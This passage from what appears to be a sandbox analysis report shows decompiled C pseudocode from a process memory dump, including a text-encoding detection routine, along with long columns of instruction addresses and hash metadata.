												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                                                                                                                          0x03beb095
                                                                                                                                          0x03beb09b
                                                                                                                                          0x03beb09f
                                                                                                                                          0x03beb0a5
                                                                                                                                          0x03beb0a7
                                                                                                                                          0x03beb0aa
                                                                                                                                          0x03beb0ad
                                                                                                                                          0x03beb0b1
                                                                                                                                          0x03beb3f8
                                                                                                                                          0x03beb3fa
                                                                                                                                          0x03beb3ff
                                                                                                                                          0x03beb419
                                                                                                                                          0x03beb41b
                                                                                                                                          0x03beb41b
                                                                                                                                          0x03beb401
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb0b7
                                                                                                                                          0x03beb0b9
                                                                                                                                          0x03beb0bc
                                                                                                                                          0x03beb0c0
                                                                                                                                          0x03beb0c2
                                                                                                                                          0x03beb0c2
                                                                                                                                          0x03beb0c4
                                                                                                                                          0x03beb0c8
                                                                                                                                          0x03beb0cf
                                                                                                                                          0x03beb0d1
                                                                                                                                          0x03beb0d1
                                                                                                                                          0x03beb0da
                                                                                                                                          0x03beb0dd
                                                                                                                                          0x03beb0df
                                                                                                                                          0x03beb0df
                                                                                                                                          0x03beb0e4
                                                                                                                                          0x03beb0e9
                                                                                                                                          0x03beb3e2
                                                                                                                                          0x03beb3e5
                                                                                                                                          0x03beb3eb
                                                                                                                                          0x03c3a676
                                                                                                                                          0x03c3a67b
                                                                                                                                          0x03c3a67d
                                                                                                                                          0x03beb3f1
                                                                                                                                          0x03beb3f1
                                                                                                                                          0x03beb3f1
                                                                                                                                          0x03beb0ef
                                                                                                                                          0x03beb0ef
                                                                                                                                          0x03beb0ef
                                                                                                                                          0x03beb0e9
                                                                                                                                          0x03beb0f6
                                                                                                                                          0x03beb28d
                                                                                                                                          0x03beb28e
                                                                                                                                          0x03beb293
                                                                                                                                          0x03beb0fc
                                                                                                                                          0x03beb0fc
                                                                                                                                          0x03beb101
                                                                                                                                          0x03beb104
                                                                                                                                          0x03beb107
                                                                                                                                          0x03beb10c
                                                                                                                                          0x03c3a687
                                                                                                                                          0x03c3a68d
                                                                                                                                          0x03c3a68d
                                                                                                                                          0x03c3a687
                                                                                                                                          0x03beb112
                                                                                                                                          0x03beb116
                                                                                                                                          0x03c3a696
                                                                                                                                          0x03c3a69c
                                                                                                                                          0x03c3a69c
                                                                                                                                          0x03c3a696
                                                                                                                                          0x03beb120
                                                                                                                                          0x03beb121
                                                                                                                                          0x03beb124
                                                                                                                                          0x03beb127
                                                                                                                                          0x03beb12a
                                                                                                                                          0x03beb12d
                                                                                                                                          0x03beb132
                                                                                                                                          0x03c3a6a5
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a6ab
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb138
                                                                                                                                          0x03beb138
                                                                                                                                          0x03beb13a
                                                                                                                                          0x03beb193
                                                                                                                                          0x03beb197
                                                                                                                                          0x03beb19d
                                                                                                                                          0x03beb29c
                                                                                                                                          0x03beb29f
                                                                                                                                          0x03beb2a2
                                                                                                                                          0x03beb2a7
                                                                                                                                          0x03c3a6d2
                                                                                                                                          0x03c3a6d8
                                                                                                                                          0x03c3a6d8
                                                                                                                                          0x03c3a6d2
                                                                                                                                          0x03beb2af
                                                                                                                                          0x03beb420
                                                                                                                                          0x03beb422
                                                                                                                                          0x03beb423
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb2b5
                                                                                                                                          0x03beb2b5
                                                                                                                                          0x03beb2ba
                                                                                                                                          0x03c3a6e1
                                                                                                                                          0x03c3a6e7
                                                                                                                                          0x03c3a6e7
                                                                                                                                          0x03c3a6e1
                                                                                                                                          0x03beb2c2
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb2c8
                                                                                                                                          0x03beb2cb
                                                                                                                                          0x03beb2d0
                                                                                                                                          0x03c3a6f0
                                                                                                                                          0x03c3a6f6
                                                                                                                                          0x03c3a6f6
                                                                                                                                          0x03c3a6f0
                                                                                                                                          0x03beb2d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb2de
                                                                                                                                          0x03beb2de
                                                                                                                                          0x03beb2de
                                                                                                                                          0x03beb2e1
                                                                                                                                          0x03beb2e6
                                                                                                                                          0x03beb2eb
                                                                                                                                          0x03c3a6ff
                                                                                                                                          0x03c3a705
                                                                                                                                          0x03c3a705
                                                                                                                                          0x03c3a6ff
                                                                                                                                          0x03beb2f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb2f9
                                                                                                                                          0x03beb2fb
                                                                                                                                          0x03beb2fd
                                                                                                                                          0x03beb301
                                                                                                                                          0x03beb303
                                                                                                                                          0x03beb303
                                                                                                                                          0x03beb308
                                                                                                                                          0x03beb30b
                                                                                                                                          0x03beb310
                                                                                                                                          0x03beb312
                                                                                                                                          0x03beb312
                                                                                                                                          0x03beb31c
                                                                                                                                          0x03beb322
                                                                                                                                          0x03beb327
                                                                                                                                          0x03c3a70e
                                                                                                                                          0x03beb335
                                                                                                                                          0x03beb337
                                                                                                                                          0x03c3a71d
                                                                                                                                          0x03c3a723
                                                                                                                                          0x03c3a723
                                                                                                                                          0x03c3a71d
                                                                                                                                          0x03beb340
                                                                                                                                          0x03beb345
                                                                                                                                          0x03beb349
                                                                                                                                          0x03c3a72a
                                                                                                                                          0x03c3a72a
                                                                                                                                          0x03beb352
                                                                                                                                          0x03beb357
                                                                                                                                          0x03beb359
                                                                                                                                          0x03beb359
                                                                                                                                          0x03beb365
                                                                                                                                          0x03beb367
                                                                                                                                          0x03beb36c
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb36c
                                                                                                                                          0x03c3a714
                                                                                                                                          0x03c3a714
                                                                                                                                          0x03beb32f
                                                                                                                                          0x03beb3b8
                                                                                                                                          0x03beb3bd
                                                                                                                                          0x03beb3c4
                                                                                                                                          0x03beb425
                                                                                                                                          0x03beb427
                                                                                                                                          0x03beb429
                                                                                                                                          0x03beb429
                                                                                                                                          0x03beb427
                                                                                                                                          0x03beb3c8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb3ce
                                                                                                                                          0x03beb42f
                                                                                                                                          0x03beb3d0
                                                                                                                                          0x03beb3d0
                                                                                                                                          0x03beb3d0
                                                                                                                                          0x03beb3d7
                                                                                                                                          0x03beb3da
                                                                                                                                          0x03beb3da
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb32f
                                                                                                                                          0x03beb2f3
                                                                                                                                          0x03beb2d8
                                                                                                                                          0x03beb2c2
                                                                                                                                          0x03beb2af
                                                                                                                                          0x03beb1a3
                                                                                                                                          0x03beb1a9
                                                                                                                                          0x03beb1af
                                                                                                                                          0x03beb1b2
                                                                                                                                          0x03beb1b5
                                                                                                                                          0x03beb1b8
                                                                                                                                          0x03c3a733
                                                                                                                                          0x03c3a739
                                                                                                                                          0x03c3a739
                                                                                                                                          0x03c3a733
                                                                                                                                          0x03beb1c0
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb1c6
                                                                                                                                          0x03beb1c8
                                                                                                                                          0x03beb1cb
                                                                                                                                          0x03beb1ce
                                                                                                                                          0x03beb1d3
                                                                                                                                          0x03c3a742
                                                                                                                                          0x03c3a748
                                                                                                                                          0x03c3a748
                                                                                                                                          0x03c3a742
                                                                                                                                          0x03beb1db
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb1e1
                                                                                                                                          0x03beb1e1
                                                                                                                                          0x03beb1e6
                                                                                                                                          0x03beb1e9
                                                                                                                                          0x03beb1ee
                                                                                                                                          0x03c3a751
                                                                                                                                          0x03beb409
                                                                                                                                          0x03beb409
                                                                                                                                          0x03beb40e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb410
                                                                                                                                          0x03beb22d
                                                                                                                                          0x03beb22f
                                                                                                                                          0x03c3a790
                                                                                                                                          0x03c3a796
                                                                                                                                          0x03c3a796
                                                                                                                                          0x03c3a790
                                                                                                                                          0x03beb23d
                                                                                                                                          0x03beb243
                                                                                                                                          0x03beb248
                                                                                                                                          0x03c3a79f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a7a5
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb24e
                                                                                                                                          0x03beb24e
                                                                                                                                          0x03beb250
                                                                                                                                          0x03beb374
                                                                                                                                          0x03beb379
                                                                                                                                          0x03beb37e
                                                                                                                                          0x03c3a7ae
                                                                                                                                          0x03c3a7b4
                                                                                                                                          0x03c3a7b4
                                                                                                                                          0x03c3a7ae
                                                                                                                                          0x03beb386
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb38c
                                                                                                                                          0x03beb38e
                                                                                                                                          0x03c3a7bd
                                                                                                                                          0x03beb394
                                                                                                                                          0x03beb394
                                                                                                                                          0x03beb394
                                                                                                                                          0x03beb39b
                                                                                                                                          0x03beb39e
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb39e
                                                                                                                                          0x03beb386
                                                                                                                                          0x03beb256
                                                                                                                                          0x03beb258
                                                                                                                                          0x03c3a7c6
                                                                                                                                          0x03c3a7cc
                                                                                                                                          0x03c3a7cc
                                                                                                                                          0x03c3a7c6
                                                                                                                                          0x03beb261
                                                                                                                                          0x03beb266
                                                                                                                                          0x03beb26a
                                                                                                                                          0x03c3a7d3
                                                                                                                                          0x03c3a7d3
                                                                                                                                          0x03beb273
                                                                                                                                          0x03beb278
                                                                                                                                          0x03beb27a
                                                                                                                                          0x03beb27a
                                                                                                                                          0x03beb281
                                                                                                                                          0x03beb283
                                                                                                                                          0x03beb285
                                                                                                                                          0x03beb287
                                                                                                                                          0x03beb289
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb289
                                                                                                                                          0x03beb248
                                                                                                                                          0x03c3a757
                                                                                                                                          0x03c3a757
                                                                                                                                          0x03beb1f6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb1fc
                                                                                                                                          0x03beb201
                                                                                                                                          0x03c3a760
                                                                                                                                          0x03c3a766
                                                                                                                                          0x03c3a766
                                                                                                                                          0x03c3a760
                                                                                                                                          0x03beb209
                                                                                                                                          0x03beb3a8
                                                                                                                                          0x03c3a76f
                                                                                                                                          0x03beb3ae
                                                                                                                                          0x03beb3ae
                                                                                                                                          0x03beb3ae
                                                                                                                                          0x03beb3b0
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb20f
                                                                                                                                          0x03beb20f
                                                                                                                                          0x03beb213
                                                                                                                                          0x03c3a778
                                                                                                                                          0x03c3a77e
                                                                                                                                          0x03c3a77e
                                                                                                                                          0x03c3a778
                                                                                                                                          0x03beb21b
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb221
                                                                                                                                          0x03beb223
                                                                                                                                          0x03c3a787
                                                                                                                                          0x03beb229
                                                                                                                                          0x03beb229
                                                                                                                                          0x03beb229
                                                                                                                                          0x03beb22b
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb22b
                                                                                                                                          0x03beb21b
                                                                                                                                          0x03beb209
                                                                                                                                          0x03beb1db
                                                                                                                                          0x03beb142
                                                                                                                                          0x03beb142
                                                                                                                                          0x03beb146
                                                                                                                                          0x03beb148
                                                                                                                                          0x03beb14c
                                                                                                                                          0x03beb14f
                                                                                                                                          0x03beb154
                                                                                                                                          0x03beb15b
                                                                                                                                          0x03c3a6b4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a6ba
                                                                                                                                          0x03c3a6ba
                                                                                                                                          0x03beb163
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb163
                                                                                                                                          0x03beb13a
                                                                                                                                          0x03beb169
                                                                                                                                          0x03beb16b
                                                                                                                                          0x03beb16e
                                                                                                                                          0x03beb171
                                                                                                                                          0x03beb175
                                                                                                                                          0x03beb178
                                                                                                                                          0x03c3a6c3
                                                                                                                                          0x03c3a6c9
                                                                                                                                          0x03c3a6c9
                                                                                                                                          0x03c3a6c3
                                                                                                                                          0x03beb180
                                                                                                                                          0x03beb184
                                                                                                                                          0x00000000
                                                                                                                                          0x03beb104
                                                                                                                                          0x03beb0f6

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                                                                                          • Instruction ID: 38a84c48c419f2f2a846162410a286e3518ed4b69ebd0b8a42879c214389c453
                                                                                                                                          • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                                                                                          • Instruction Fuzzy Hash: D1D1C276B182168BCB21CE6DC5C066ABBF5EF86358F2C81F8DCA5CB241E771D9418790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD0D20 Relevance: .4, Instructions: 372COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 99%
                                                                                                                                          			E03BD0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x3cc6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x3cc6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x3cc6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x3bd1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M03BD1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                                                                                                                          0x03bd0d2b
                                                                                                                                          0x03bd0d2e
                                                                                                                                          0x03bd0d32
                                                                                                                                          0x03bd0d39
                                                                                                                                          0x03bd0d3b
                                                                                                                                          0x03bd0d3d
                                                                                                                                          0x03bd0d3f
                                                                                                                                          0x03bd0d46
                                                                                                                                          0x03bd0d4d
                                                                                                                                          0x03bd0d54
                                                                                                                                          0x03bd0d5b
                                                                                                                                          0x03bd0d62
                                                                                                                                          0x03bd0d69
                                                                                                                                          0x03bd0d70
                                                                                                                                          0x03bd0d77
                                                                                                                                          0x03bd0d7e
                                                                                                                                          0x03bd0d85
                                                                                                                                          0x03bd0d88
                                                                                                                                          0x03bd0d8b
                                                                                                                                          0x03bd0d8e
                                                                                                                                          0x03bd0d91
                                                                                                                                          0x03bd0d94
                                                                                                                                          0x03bd0d97
                                                                                                                                          0x03bd0d9a
                                                                                                                                          0x03bd0d9d
                                                                                                                                          0x03bd0da6
                                                                                                                                          0x03bd10e9
                                                                                                                                          0x03bd10ee
                                                                                                                                          0x03bd0db9
                                                                                                                                          0x03bd0db9
                                                                                                                                          0x03bd0dbc
                                                                                                                                          0x03c2e9c7
                                                                                                                                          0x03c2e9ca
                                                                                                                                          0x03c2e9cd
                                                                                                                                          0x03c2e9d0
                                                                                                                                          0x03c2e9dd
                                                                                                                                          0x03c2e9dd
                                                                                                                                          0x03bd0dec
                                                                                                                                          0x03bd0dec
                                                                                                                                          0x03bd0dee
                                                                                                                                          0x03bd0df3
                                                                                                                                          0x03bd0ebf
                                                                                                                                          0x03bd0ec0
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0df9
                                                                                                                                          0x03bd0df9
                                                                                                                                          0x03bd0e1e
                                                                                                                                          0x03bd0e21
                                                                                                                                          0x03bd0e24
                                                                                                                                          0x03bd0e27
                                                                                                                                          0x03bd0e2a
                                                                                                                                          0x03bd0e2d
                                                                                                                                          0x03bd0e30
                                                                                                                                          0x03bd0e36
                                                                                                                                          0x03bd1040
                                                                                                                                          0x03bd1043
                                                                                                                                          0x03bd1049
                                                                                                                                          0x03bd1049
                                                                                                                                          0x03bd0e3c
                                                                                                                                          0x03bd0e3f
                                                                                                                                          0x03bd1007
                                                                                                                                          0x03bd100a
                                                                                                                                          0x03bd1010
                                                                                                                                          0x03bd1010
                                                                                                                                          0x03bd100a
                                                                                                                                          0x03bd0e3f
                                                                                                                                          0x03bd0e58
                                                                                                                                          0x03bd0e5d
                                                                                                                                          0x03bd1000
                                                                                                                                          0x03bd0e63
                                                                                                                                          0x03bd0e63
                                                                                                                                          0x03bd0e63
                                                                                                                                          0x03bd0e67
                                                                                                                                          0x03bd0e69
                                                                                                                                          0x03bd0e69
                                                                                                                                          0x03bd0e6d
                                                                                                                                          0x03bd0e70
                                                                                                                                          0x03bd0e74
                                                                                                                                          0x03bd0e76
                                                                                                                                          0x03bd0e76
                                                                                                                                          0x03bd0e7a
                                                                                                                                          0x03bd0e7c
                                                                                                                                          0x03bd0e7c
                                                                                                                                          0x03bd0e83
                                                                                                                                          0x03bd0e86
                                                                                                                                          0x03bd0e87
                                                                                                                                          0x03bd0e89
                                                                                                                                          0x03bd0e8b
                                                                                                                                          0x03bd0e91
                                                                                                                                          0x03bd0e00
                                                                                                                                          0x03bd0e03
                                                                                                                                          0x03bd0e03
                                                                                                                                          0x03bd0e07
                                                                                                                                          0x03bd0e0f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0e0f
                                                                                                                                          0x03bd0e97
                                                                                                                                          0x03bd0e9c
                                                                                                                                          0x03bd113e
                                                                                                                                          0x03bd1141
                                                                                                                                          0x03bd1143
                                                                                                                                          0x03bd0eb1
                                                                                                                                          0x03bd0eb1
                                                                                                                                          0x03bd0eb4
                                                                                                                                          0x03bd0eb6
                                                                                                                                          0x03bd1110
                                                                                                                                          0x03bd1112
                                                                                                                                          0x03c2ea25
                                                                                                                                          0x03c2ea25
                                                                                                                                          0x03bd0ec3
                                                                                                                                          0x03bd0ec3
                                                                                                                                          0x03bd0ecb
                                                                                                                                          0x03bd10fe
                                                                                                                                          0x03bd0ed1
                                                                                                                                          0x03bd0ed1
                                                                                                                                          0x03bd0ed1
